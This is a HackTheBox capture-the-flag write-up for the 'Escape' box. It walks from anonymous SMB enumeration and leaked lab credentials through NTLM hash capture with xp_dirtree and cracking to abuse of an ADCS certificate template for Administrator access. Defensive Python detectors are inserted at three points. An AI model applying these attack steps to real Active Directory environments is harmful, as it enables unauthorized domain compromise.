HACKTHEBOX — ESCAPE

Introduction of the Box

Nathaneal Meththananda
6 min read · Jun 28, 2023

Escape is a very Windows-centric box focusing on MSSQL Server and Active Directory Certificate Services (ADCS). I’ll start by finding some MSSQL creds on an open file share. With those, I’ll use xp_dirtree to get a Net-NTLMv2 challenge/response and crack that to get the sql_svc password. That user has access to logs that contain the next user’s creds. To get administrator, I’ll attack Active Directory Certificate Services, showing both Certify.

RECONNAISSANCE

RustScan finds many open TCP ports and confirms that Kerberos is running on the network.

From the results the host looks like a Windows domain controller, with port 445 (SMB), 135/139 (NetBIOS), 389 (LDAP) and 5985 (WinRM) listening on the DC; the scan also shows an MSSQL service (port 1433) running in this infrastructure.

Running the Nmap scripts against port 1433 gives more information about the SQL Server.

The scan shows that sequel.htb is the domain name and dc.sequel.htb is the domain controller of the network. I’ll be adding them to my /etc/hosts file.

SMB — TCP 445

I’ll enumerate the SMB service using crackmapexec without any credentials, but it fails to list the shares.

root@snowdox$ crackmapexec smb 10.10.11.202 --shares

SMB 10.10.11.202 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)

SMB 10.10.11.202 445 DC [-] Error enumerating shares: STATUS_USER_SESSION_DELETED

Now I’ll try again, giving a random username and an empty password as the credential parameters.

root@snowdox$ crackmapexec smb 10.10.11.202 -u apt0xsnowdox -p '' --shares

SMB 10.10.11.202 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)

SMB 10.10.11.202 445 DC [+] sequel.htb\0xdfnotreallyausername:

SMB 10.10.11.202 445 DC [+] Enumerated shares

SMB 10.10.11.202 445 DC Share Permissions Remark

SMB 10.10.11.202 445 DC ----- ----------- ------

SMB 10.10.11.202 445 DC ADMIN$ Remote Admin

SMB 10.10.11.202 445 DC C$ Default share

SMB 10.10.11.202 445 DC IPC$ READ Remote IPC

SMB 10.10.11.202 445 DC NETLOGON Logon server share

SMB 10.10.11.202 445 DC Public READ

SMB 10.10.11.202 445 DC SYSVOL Logon server share

Since the Public share is readable, I’ll connect with smbclient using -N (no password) and download the PDF file stored on the share.

SQL Server Procedures.pdf

After downloading the PDF from the SMB share, I opened it with the evince utility; it contains information about the MSSQL service.

Scrolling down, the document gives credentials for accessing the MSSQL server as a guest user.

As the above image shows the username is ‘PublicUser’ and the password ‘GuestUserCantWrite1’.

MSSQL

To connect to the MSSQL server I’ll use mssqlclient.py from the Impacket Library using the credentials I found from the PDF file.

From this article there are many payloads we can use to enumerate the server.

Shell as sql_svc

Since we have access to the MSSQL server, we need to get a shell somehow, so I thought of using the xp_dirtree procedure: it makes the SQL Server service account open a UNC path I control, which leaks that account’s Net-NTLMv2 challenge/response.

First I started smbserver to host a share on my attacking machine.

Next I made the SQL Server connect to that share through the xp_dirtree procedure.

Going back to the smbserver window, we are greeted with the Net-NTLMv2 challenge/response of the user sql_svc.
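As an added detection-side example (not part of the original walkthrough), the following Python script flags statements in which the SQL Server is made to open a UNC path outside the organisation’s own network, which is exactly how the challenge/response above leaks. The log lines, the 10.10.11.0/24 trusted range, the address 10.10.14.99 and the simplified "timestamp login statement" layout are all constructed for the demo and are not real SQL Server audit output.

```python
import re
from ipaddress import ip_address, ip_network

# Networks and DNS suffix the SQL Server is allowed to reach over SMB.
# Both values are assumptions for this demo (the lab's /24 and domain name).
TRUSTED_NETS = [ip_network("10.10.11.0/24")]
TRUSTED_SUFFIX = ".sequel.htb"

# Extended procedures that make the service account open a UNC path.
UNC_PROCS = re.compile(r"\b(xp_dirtree|xp_fileexist|xp_subdirs)\b", re.I)
# A UNC path inside a T-SQL string literal: '\\host\share...' -> captures host.
UNC_HOST = re.compile(r"'\\\\([^\\']+)")
# Simplified record layout: <timestamp> <login> <statement>
LINE = re.compile(r"^(\S+)\s+(\S+)\s+(.*)$")

# Constructed sample records (not real audit output). 10.10.14.99 stands in
# for a host outside the trusted network.
SAMPLE_AUDIT = """\
2023-06-28T10:01:12 sequel\\svc_backup EXEC xp_dirtree '\\\\dc.sequel.htb\\backups', 1, 1
2023-06-28T10:02:40 PublicUser EXEC master..xp_dirtree '\\\\10.10.14.99\\share'
2023-06-28T10:03:05 PublicUser SELECT name FROM sys.databases
2023-06-28T10:04:19 PublicUser EXEC xp_fileexist '\\\\10.10.14.99\\x\\f.txt'
"""


def is_trusted(host: str) -> bool:
    """True when the UNC host is inside the organisation's own network."""
    try:
        return any(ip_address(host) in net for net in TRUSTED_NETS)
    except ValueError:
        pass  # not an IP literal, treat it as a hostname
    return host.lower().endswith(TRUSTED_SUFFIX)


def find_outbound_unc(log_text: str) -> list:
    """Return one alert per UNC host that a file-system xp_ procedure was
    pointed at and that lies outside the trusted network."""
    alerts = []
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        ts, login, stmt = m.groups()
        proc = UNC_PROCS.search(stmt)
        if not proc:
            continue
        for host in UNC_HOST.findall(stmt):
            if not is_trusted(host):
                alerts.append({"time": ts, "login": login,
                               "procedure": proc.group(1).lower(), "host": host})
    return alerts


if __name__ == "__main__":
    for a in find_outbound_unc(SAMPLE_AUDIT):
        print(f"{a['time']} {a['login']} called {a['procedure']} "
              f"against untrusted host {a['host']}")
```

In production the records would come from SQL Server Audit or an Extended Events session capturing statement text; the same logic applies. The alert is only half the story: revoking EXECUTE on xp_dirtree and xp_fileexist from the public role and blocking outbound TCP 445 from database servers at the firewall remove the leak itself.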

Cracking the Challenge Response

I’ll use John the Ripper to crack it. Check the following article to learn how to crack hashes with John the Ripper.

It cracks the password to ‘REGGIE1234ronnie’ rapidly.

WINRM — 5985

With the credentials I found, I can now get a shell as the sql_svc user via Evil-WinRM. Install Evil-WinRM using this guide.

Shell as Ryan.Cooper

Enumeration

The home directory of the sql_svc user is empty, but after a bit of enumeration on the system I found the directory that holds the MSSQL server’s log files.

In the Logs directory there is a file named “ERRORLOG.BAK”.

I had to crawl through the entries in that file to find credentials for the user Ryan.

After finding the credentials for that user, I used Evil-WinRM to get a shell as Ryan.
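The credentials end up in ERRORLOG because a password typed into the username field is logged verbatim as a failed login. As an added example (not from the post), here is a small Python detector a defender can run over the SQL Server ERRORLOG to find such entries: it looks for a failed login whose "user name" does not exist and is not shaped like an account, but follows, within a minute and from the same client, a password failure for a real account. It masks the suspect value instead of printing it. The sample lines and the placeholder string NotARealLogin-Placeholder1 are constructed; nothing from the real log is reproduced.

```python
import re
from datetime import datetime, timedelta

# One ERRORLOG line per failed login (error 18456). Captures timestamp,
# the name presented, the reason text and the client address.
FAILED = re.compile(
    r"^(\S+ \S+) Logon\s+Login failed for user '([^']*)'\. "
    r"Reason: (.*?) \[CLIENT: ([^\]]+)\]"
)
# How close a "real account" failure must be to count as the same attempt.
WINDOW = timedelta(seconds=60)

# Constructed ERRORLOG-style lines (layout follows SQL Server's ERRORLOG;
# contents are made up). State 8 = wrong password, state 5 = login not found.
SAMPLE_ERRORLOG = """\
2023-02-07 20:30:32.44 Logon       Error: 18456, Severity: 14, State: 8.
2023-02-07 20:30:32.44 Logon       Login failed for user 'sequel.htb\\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.11.202]
2023-02-07 20:30:38.12 Logon       Error: 18456, Severity: 14, State: 5.
2023-02-07 20:30:38.12 Logon       Login failed for user 'NotARealLogin-Placeholder1'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.11.202]
2023-02-07 20:31:02.90 Logon       Error: 18456, Severity: 14, State: 5.
2023-02-07 20:31:02.90 Logon       Login failed for user 'sequel.htb\\jdoe'. Reason: Could not find a login matching the name provided. [CLIENT: 10.10.11.50]
"""


def looks_like_account(name: str) -> bool:
    """DOMAIN\\user or user@domain shapes are account names, not secrets."""
    return "\\" in name or "@" in name


def mask(value: str) -> str:
    """Keep only the first character so the finding never re-leaks the secret."""
    return value[:1] + "*" * (len(value) - 1) if value else ""


def parse_failures(text: str) -> list:
    events = []
    for line in text.splitlines():
        m = FAILED.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S.%f")
            events.append({"time": ts, "user": m.group(2),
                           "reason": m.group(3), "client": m.group(4)})
    return events


def find_leaked_secrets(text: str) -> list:
    """Unknown, non-account-shaped login names that closely follow a password
    failure for a real account from the same client are probably passwords."""
    events = parse_failures(text)
    findings = []
    for i, ev in enumerate(events):
        if looks_like_account(ev["user"]) or "Could not find a login" not in ev["reason"]:
            continue
        for prev in reversed(events[:i]):
            if ev["time"] - prev["time"] > WINDOW:
                break
            if prev["client"] == ev["client"] and looks_like_account(prev["user"]):
                findings.append({"time": ev["time"].isoformat(), "client": ev["client"],
                                 "likely_account": prev["user"],
                                 "masked_value": mask(ev["user"])})
                break
    return findings


if __name__ == "__main__":
    for f in find_leaked_secrets(SAMPLE_ERRORLOG):
        print(f"{f['time']} client {f['client']}: probable password for "
              f"{f['likely_account']} logged as '{f['masked_value']}'")
```

A hit means two things for the defender: the account’s password must be rotated, and the log file (including rotated copies such as ERRORLOG.BAK, which is exactly what was readable here) should be purged or restricted to the service account and administrators.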

Since I had no idea about the configuration of this user, I uploaded the winPEAS.exe binary to look for potential vulnerabilities, misconfigurations or running services I could exploit.

Going thoroughly through the winPEAS output, I found that Active Directory Certificate Services is running in the domain.

After identifying the service, I used the Certify.exe binary to look for vulnerable certificate templates in the AD environment.

Identify Vulnerable Template

So I uploaded the binary to the victim machine via Evil-WinRM.

Then I ran Certify.exe to look for vulnerable templates.

Certify found a vulnerable template, reporting the CA name, the domain name and all the enrollment rights on it.
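Certify reports a template as vulnerable when several conditions hold at once; the example below (added here, not Certify’s code and not from the post) is the check a defender runs over the template attributes in AD to catch the same misconfiguration before an attacker does. The LDAP attribute names, flag bits and EKU OIDs are the real schema values; the template names and attribute dictionaries are constructed, with ExampleVulnTemplate standing in for the template Certify reported, and enrollment rights are simplified to a list of principal names.

```python
# Bit in msPKI-Certificate-Name-Flag: the requester may supply the subject/SAN.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# Bit in msPKI-Enrollment-Flag: issuance waits for CA manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKUs that let a certificate authenticate a user to Active Directory.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Principals whose enrollment right means "any domain account can enroll".
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

# Constructed sample templates (attribute values as seen in AD, names made up).
TEMPLATES = {
    "ExampleVulnTemplate": {  # placeholder for the template Certify flagged
        "msPKI-Certificate-Name-Flag": 0x1,
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
        "enroll": ["Domain Users", "Domain Admins"],
    },
    "User": {  # default template: subject is built from AD, so not ESC1
        "msPKI-Certificate-Name-Flag": 0xA6000000,
        "msPKI-Enrollment-Flag": 0x29,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4",
                                "1.3.6.1.4.1.311.10.3.4"],
        "enroll": ["Domain Users"],
    },
    "WebServer": {  # enrollee supplies subject, but server-auth only, admins enroll
        "msPKI-Certificate-Name-Flag": 0x1,
        "msPKI-Enrollment-Flag": 0x0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
        "enroll": ["Domain Admins", "Enterprise Admins"],
    },
}


def esc1_findings(t: dict) -> list:
    """Return the reasons a template is ESC1-exploitable, or [] if any of the
    five conditions is missing (all must hold at the same time)."""
    reasons = []
    if t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee supplies subject (SAN can name any account)")
    ekus = set(t.get("pKIExtendedKeyUsage", []))
    if not ekus:
        reasons.append("no EKU restriction (any purpose)")
    elif ekus & AUTH_EKUS:
        reasons.append("EKU permits client authentication")
    if not t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        reasons.append("no manager approval required")
    if t.get("msPKI-RA-Signature", 0) == 0:
        reasons.append("no authorized signature required")
    enrollers = set(t.get("enroll", [])) & LOW_PRIV
    if enrollers:
        reasons.append("low-privileged enrollment: " + ", ".join(sorted(enrollers)))
    return reasons if len(reasons) == 5 else []


def audit(templates: dict) -> dict:
    """Map template name -> reasons, for every template that meets all conditions."""
    return {name: esc1_findings(t) for name, t in templates.items() if esc1_findings(t)}


if __name__ == "__main__":
    for name, reasons in audit(TEMPLATES).items():
        print(f"{name}: ESC1")
        for r in reasons:
            print("  -", r)
```

Any single condition removed closes the hole, which is why the fix is usually to clear CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT or to require manager approval, and to trim the enrollment ACL to the group that actually needs the template; in a real audit the dictionaries are filled from the objects under CN=Certificate Templates,CN=Public Key Services,CN=Services in the configuration partition.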

Abuse Template with Certify & Rubeus

I will now request a certificate with an alternative name of administrator, which returns a cert.pem. This blog has more information on how this attack works.

I’ll copy the certificate and its private key to my machine and convert them into a .pfx file, since Rubeus only understands that format.

Now I’ll upload cert.pfx and the Rubeus.exe binary through the shell we got via Evil-WinRM.

I run the asktgt command, passing cert.pfx, to get a TGT as the administrator.

Here I used the /getcredentials flag to retrieve the NTLM hash of the administrator so that we can log in to that account via Evil-WinRM using the hash.

Passing the hash to the tool, I was able to log in to the machine as Administrator.

ADDITIONAL

We can also use Certipy to obtain the private key remotely and perform the same steps we did with Certify.exe.

I hope you learned something about ADCS attacks in Active Directory; stay tuned for more walkthroughs as well as my research papers.

Peace!

APT0xSnowodx


Nathaneal Meththananda

19 years | Security Engineer | Malware Analyst | Penetration Tester | Sri Lankan